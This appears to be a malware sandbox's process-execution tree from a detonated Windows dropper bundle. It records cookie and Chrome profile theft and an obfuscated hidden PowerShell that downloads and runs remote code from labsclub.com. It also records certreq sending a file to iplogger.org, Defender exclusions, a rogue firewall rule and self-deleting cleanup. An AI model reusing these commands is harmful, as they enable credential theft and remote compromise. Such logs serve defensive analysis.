C:\Users\Admin\AppData\Local\Temp\is-J6527.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-J6527.tmp\PictureLAb.tmp" /SL5="$908A0,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-OBV7J.tmp\PictureLAb.exe" /Verysilent28⤵PID:12640
-
C:\Users\Admin\AppData\Local\Temp\is-IES2E.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-IES2E.tmp\Setup.exe" /VERYSILENT29⤵PID:14300
-
C:\Users\Admin\AppData\Local\Temp\is-SOH6F.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-SOH6F.tmp\Setup.tmp" /SL5="$80260,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-IES2E.tmp\Setup.exe" /VERYSILENT30⤵PID:12564
-
C:\Users\Admin\AppData\Local\Temp\is-IG741.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-IG741.tmp\def.exe" /S /UID=lab21431⤵PID:6088
-
C:\Users\Admin\AppData\Local\Temp\ff-d0725-678-c5388-7967c772a2504\Qehekaxazhy.exe"C:\Users\Admin\AppData\Local\Temp\ff-d0725-678-c5388-7967c772a2504\Qehekaxazhy.exe"32⤵PID:4260
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tmjhfvaf.3mx\customer4.exe & exit33⤵PID:11248
-
C:\Users\Admin\AppData\Local\Temp\tmjhfvaf.3mx\customer4.exeC:\Users\Admin\AppData\Local\Temp\tmjhfvaf.3mx\customer4.exe34⤵PID:13308
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"35⤵PID:11584
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bkc2bpbo.pzp\askinstall18.exe & exit33⤵PID:14104
-
C:\Users\Admin\AppData\Local\Temp\bkc2bpbo.pzp\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\bkc2bpbo.pzp\askinstall18.exe34⤵PID:6136
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe35⤵PID:14372
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe36⤵
- Kills process with taskkill
PID:14476
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\" /s /e /y35⤵PID:15296
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jwyz45ts.ng2\md7_7dfj.exe & exit33⤵PID:6040
-
C:\Users\Admin\AppData\Local\Temp\jwyz45ts.ng2\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\jwyz45ts.ng2\md7_7dfj.exe34⤵PID:15056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hlhp35vs.hco\privacytools5.exe & exit33⤵PID:12500
-
C:\Users\Admin\AppData\Local\Temp\hlhp35vs.hco\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\hlhp35vs.hco\privacytools5.exe34⤵PID:11616
-
C:\Users\Admin\AppData\Local\Temp\hlhp35vs.hco\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\hlhp35vs.hco\privacytools5.exe35⤵PID:3268
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0hgradks.ovo\GcleanerWW.exe /mixone & exit33⤵PID:14668
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\54e1xena.ksf\setup.exe /8-2222 & exit33⤵PID:15344
-
C:\Users\Admin\AppData\Local\Temp\54e1xena.ksf\setup.exeC:\Users\Admin\AppData\Local\Temp\54e1xena.ksf\setup.exe /8-222234⤵PID:15936
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Throbbing-Resonance"35⤵PID:16344
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jkpgqxrj.r3c\MultitimerFour.exe & exit33⤵PID:15956
-
C:\Users\Admin\AppData\Local\Temp\jkpgqxrj.r3c\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\jkpgqxrj.r3c\MultitimerFour.exe34⤵PID:15616
-
C:\Users\Admin\AppData\Local\Temp\CZXDZB06Z3\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\CZXDZB06Z3\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10435⤵PID:9156
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-OBV7J.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-OBV7J.tmp\Delta.exe" /Verysilent27⤵PID:10428
-
C:\Users\Admin\AppData\Local\Temp\is-L4AMS.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-L4AMS.tmp\Delta.tmp" /SL5="$40C16,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-OBV7J.tmp\Delta.exe" /Verysilent28⤵PID:10456
-
C:\Users\Admin\AppData\Local\Temp\is-GO560.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-GO560.tmp\Setup.exe" /VERYSILENT29⤵PID:11772
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-GO560.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit30⤵PID:12168
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f31⤵
- Kills process with taskkill
PID:14564
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-OBV7J.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-OBV7J.tmp\zznote.exe" /Verysilent27⤵PID:13488
-
C:\Users\Admin\AppData\Local\Temp\is-RGPJ2.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-RGPJ2.tmp\zznote.tmp" /SL5="$30DA2,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-OBV7J.tmp\zznote.exe" /Verysilent28⤵PID:5676
-
C:\Users\Admin\AppData\Local\Temp\is-DUONV.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-DUONV.tmp\jg4_4jaa.exe" /silent29⤵PID:14988
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-OBV7J.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-OBV7J.tmp\hjjgaa.exe" /Verysilent27⤵PID:16368
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt28⤵PID:11520
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bcdrljtshul\vict.exe"C:\Users\Admin\AppData\Local\Temp\bcdrljtshul\vict.exe" /VERYSILENT /id=53523⤵PID:10420
-
C:\Users\Admin\AppData\Local\Temp\is-G101L.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-G101L.tmp\vict.tmp" /SL5="$10B0A,870426,780800,C:\Users\Admin\AppData\Local\Temp\bcdrljtshul\vict.exe" /VERYSILENT /id=53524⤵PID:3164
-
C:\Users\Admin\AppData\Local\Temp\is-HK929.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-HK929.tmp\wimapi.exe" 53525⤵PID:9584
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\h2evhqqour5\cepa3cywvzp.exe"C:\Users\Admin\AppData\Local\Temp\h2evhqqour5\cepa3cywvzp.exe" /ustwo INSTALL23⤵PID:8260
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "cepa3cywvzp.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\h2evhqqour5\cepa3cywvzp.exe" & exit24⤵PID:4692
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "cepa3cywvzp.exe" /f25⤵
- Kills process with taskkill
PID:13460
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\uwtbrxeugqe\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\uwtbrxeugqe\chashepro3.exe" /VERYSILENT23⤵PID:12384
-
C:\Users\Admin\AppData\Local\Temp\is-KN1RM.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-KN1RM.tmp\chashepro3.tmp" /SL5="$10BC6,1478410,58368,C:\Users\Admin\AppData\Local\Temp\uwtbrxeugqe\chashepro3.exe" /VERYSILENT24⤵PID:11120
-
-
-
C:\Users\Admin\AppData\Local\Temp\2tqsfiwjwag\app.exe"C:\Users\Admin\AppData\Local\Temp\2tqsfiwjwag\app.exe" /8-2323⤵PID:3028
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Young-Silence"24⤵PID:9440
-
-
C:\Program Files (x86)\Young-Silence\7za.exe"C:\Program Files (x86)\Young-Silence\7za.exe" e -p154.61.71.51 winamp-plugins.7z24⤵PID:6104
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Young-Silence\app.exe" -map "C:\Program Files (x86)\Young-Silence\WinmonProcessMonitor.sys""24⤵PID:8992
-
C:\Program Files (x86)\Young-Silence\app.exe"C:\Program Files (x86)\Young-Silence\app.exe" -map "C:\Program Files (x86)\Young-Silence\WinmonProcessMonitor.sys"25⤵PID:14192
-
-
-
C:\Program Files (x86)\Young-Silence\7za.exe"C:\Program Files (x86)\Young-Silence\7za.exe" e -p154.61.71.51 winamp.7z24⤵PID:3044
-
-
C:\Program Files (x86)\Young-Silence\app.exe"C:\Program Files (x86)\Young-Silence\app.exe" /8-2324⤵PID:11240
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-9VCL9.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-9VCL9.tmp\Delta.exe" /Verysilent12⤵PID:4284
-
C:\Users\Admin\AppData\Local\Temp\is-MJJE6.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-MJJE6.tmp\Delta.tmp" /SL5="$204CE,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-9VCL9.tmp\Delta.exe" /Verysilent13⤵PID:6540
-
C:\Users\Admin\AppData\Local\Temp\is-KA0TP.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-KA0TP.tmp\Setup.exe" /VERYSILENT14⤵PID:6840
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-KA0TP.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit15⤵PID:7684
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f16⤵
- Kills process with taskkill
PID:4184
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 616⤵
- Delays execution with timeout.exe
PID:5588
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-9VCL9.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-9VCL9.tmp\zznote.exe" /Verysilent12⤵PID:7024
-
C:\Users\Admin\AppData\Local\Temp\is-VHUHG.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-VHUHG.tmp\zznote.tmp" /SL5="$304CE,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-9VCL9.tmp\zznote.exe" /Verysilent13⤵PID:5108
-
C:\Users\Admin\AppData\Local\Temp\is-81N3M.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-81N3M.tmp\jg4_4jaa.exe" /silent14⤵PID:6192
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-9VCL9.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-9VCL9.tmp\hjjgaa.exe" /Verysilent12⤵PID:6204
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:3996
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:5644
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gdxltx4ebji\yp10y2jkrn1.exe"C:\Users\Admin\AppData\Local\Temp\gdxltx4ebji\yp10y2jkrn1.exe" /ustwo INSTALL8⤵
- Executes dropped EXE
PID:4536 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "yp10y2jkrn1.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\gdxltx4ebji\yp10y2jkrn1.exe" & exit9⤵PID:5428
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "yp10y2jkrn1.exe" /f10⤵
- Kills process with taskkill
PID:5904
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ufgr530jkye\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\ufgr530jkye\askinstall24.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4512 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:5008
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:4684
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\derhx0memng\ml2kmot14q2.exe"C:\Users\Admin\AppData\Local\Temp\derhx0memng\ml2kmot14q2.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4588 -
C:\Users\Admin\AppData\Local\Temp\is-9SNIE.tmp\ml2kmot14q2.tmp"C:\Users\Admin\AppData\Local\Temp\is-9SNIE.tmp\ml2kmot14q2.tmp" /SL5="$201F0,870426,780800,C:\Users\Admin\AppData\Local\Temp\derhx0memng\ml2kmot14q2.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4740 -
C:\Users\Admin\AppData\Local\Temp\is-1UTKO.tmp\winlthst.exe"C:\Users\Admin\AppData\Local\Temp\is-1UTKO.tmp\winlthst.exe" test1 test110⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:584 -
C:\Users\Admin\AppData\Local\Temp\GrgcYVAGR.exe"C:\Users\Admin\AppData\Local\Temp\GrgcYVAGR.exe"11⤵PID:9312
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'12⤵PID:11628
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:4432
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:7992
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5miaglg05ds\0tozj3aivuz.exe"C:\Users\Admin\AppData\Local\Temp\5miaglg05ds\0tozj3aivuz.exe" 57a764d042bf88⤵PID:4656
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k "C:\Program Files\UV9FA7XJF2\UV9FA7XJF.exe" 57a764d042bf8 & exit9⤵PID:4724
-
C:\Program Files\UV9FA7XJF2\UV9FA7XJF.exe"C:\Program Files\UV9FA7XJF2\UV9FA7XJF.exe" 57a764d042bf810⤵PID:5488
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\d5yb02itjuy\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\d5yb02itjuy\chashepro3.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4636 -
C:\Users\Admin\AppData\Local\Temp\is-CHNJS.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-CHNJS.tmp\chashepro3.tmp" /SL5="$201F8,1478410,58368,C:\Users\Admin\AppData\Local\Temp\d5yb02itjuy\chashepro3.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4728 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1aSny7"10⤵PID:5052
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"10⤵
- Drops file in System32 directory
PID:4924
-
-
C:\Program Files (x86)\JCleaner\Venita.exe"C:\Program Files (x86)\JCleaner\Venita.exe"10⤵
- Executes dropped EXE
PID:5064 -
C:\Program Files (x86)\JCleaner\Venita.exe"{path}"11⤵PID:7052
-
-
C:\Program Files (x86)\JCleaner\Venita.exe"{path}"11⤵PID:6700
-
-
C:\Program Files (x86)\JCleaner\Venita.exe"{path}"11⤵PID:6376
-
-
C:\Program Files (x86)\JCleaner\Venita.exe"{path}"11⤵PID:6404
-
-
C:\Program Files (x86)\JCleaner\Venita.exe"{path}"11⤵PID:6636
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\210⤵PID:5068
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\211⤵PID:4620
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1EaGq7"10⤵PID:1676
-
-
C:\Program Files (x86)\JCleaner\mex.exe"C:\Program Files (x86)\JCleaner\mex.exe"10⤵
- Executes dropped EXE
PID:4248 -
C:\Program Files (x86)\JCleaner\mex.exe"{path}"11⤵PID:5332
-
-
C:\Program Files (x86)\JCleaner\mex.exe"{path}"11⤵PID:4736
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Program Files (x86)\JCleaner\mex.exe"12⤵PID:7600
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK13⤵
- Delays execution with timeout.exe
PID:7780
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"10⤵
- Drops file in System32 directory
PID:4140
-
-
C:\Program Files (x86)\JCleaner\Brava.exe"C:\Program Files (x86)\JCleaner\Brava.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3232
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\kncyiuedqc5\vpn.exe"C:\Users\Admin\AppData\Local\Temp\kncyiuedqc5\vpn.exe" /silent /subid=4828⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4704 -
C:\Users\Admin\AppData\Local\Temp\is-3ETVU.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-3ETVU.tmp\vpn.tmp" /SL5="$4011A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\kncyiuedqc5\vpn.exe" /silent /subid=4829⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4816 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:5660
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:5852
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:4528
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:7308
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:8372
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵PID:8180
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nxd0tefhjre\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\nxd0tefhjre\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4832 -
C:\Users\Admin\AppData\Local\Temp\is-G1UT1.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-G1UT1.tmp\IBInstaller_97039.tmp" /SL5="$10322,14441882,721408,C:\Users\Admin\AppData\Local\Temp\nxd0tefhjre\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4956 -
C:\Users\Admin\AppData\Local\Temp\is-8KHJV.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-8KHJV.tmp\{app}\chrome_proxy.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4568 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-8KHJV.tmp\{app}\chrome_proxy.exe"11⤵PID:6028
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 412⤵
- Runs ping.exe
PID:7096
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703910⤵PID:4508
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\cjvjxo2n3bw\app.exe"C:\Users\Admin\AppData\Local\Temp\cjvjxo2n3bw\app.exe" /8-238⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4532 -
C:\Program Files (x86)\Muddy-Frog\7za.exe"C:\Program Files (x86)\Muddy-Frog\7za.exe" e -p154.61.71.51 winamp-plugins.7z9⤵PID:7020
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Muddy-Frog\app.exe" -map "C:\Program Files (x86)\Muddy-Frog\WinmonProcessMonitor.sys""9⤵PID:6756
-
C:\Program Files (x86)\Muddy-Frog\app.exe"C:\Program Files (x86)\Muddy-Frog\app.exe" -map "C:\Program Files (x86)\Muddy-Frog\WinmonProcessMonitor.sys"10⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4656
-
-
-
C:\Program Files (x86)\Muddy-Frog\7za.exe"C:\Program Files (x86)\Muddy-Frog\7za.exe" e -p154.61.71.51 winamp.7z9⤵PID:4404
-
-
C:\Program Files (x86)\Muddy-Frog\app.exe"C:\Program Files (x86)\Muddy-Frog\app.exe" /8-239⤵PID:7872
-
C:\Program Files (x86)\Muddy-Frog\app.exe"C:\Program Files (x86)\Muddy-Frog\app.exe" /8-2310⤵PID:8808
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"11⤵PID:12040
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes12⤵PID:10200
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /8-2311⤵PID:7572
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\cf0zmacu1vh\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\cf0zmacu1vh\askinstall24.exe"8⤵PID:12648
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:11032
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:10780
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y9⤵PID:5452
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/9⤵PID:11168
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ffc9d706e00,0x7ffc9d706e10,0x7ffc9d706e2010⤵PID:12620
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1692,8171214025751244893,686868434604653299,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2184 /prefetch:810⤵PID:6564
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1692,8171214025751244893,686868434604653299,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1760 /prefetch:810⤵PID:12984
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,8171214025751244893,686868434604653299,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2736 /prefetch:110⤵PID:9956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,8171214025751244893,686868434604653299,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3556 /prefetch:110⤵PID:12136
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,8171214025751244893,686868434604653299,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:110⤵PID:10412
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,8171214025751244893,686868434604653299,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3848 /prefetch:110⤵PID:7304
-
-
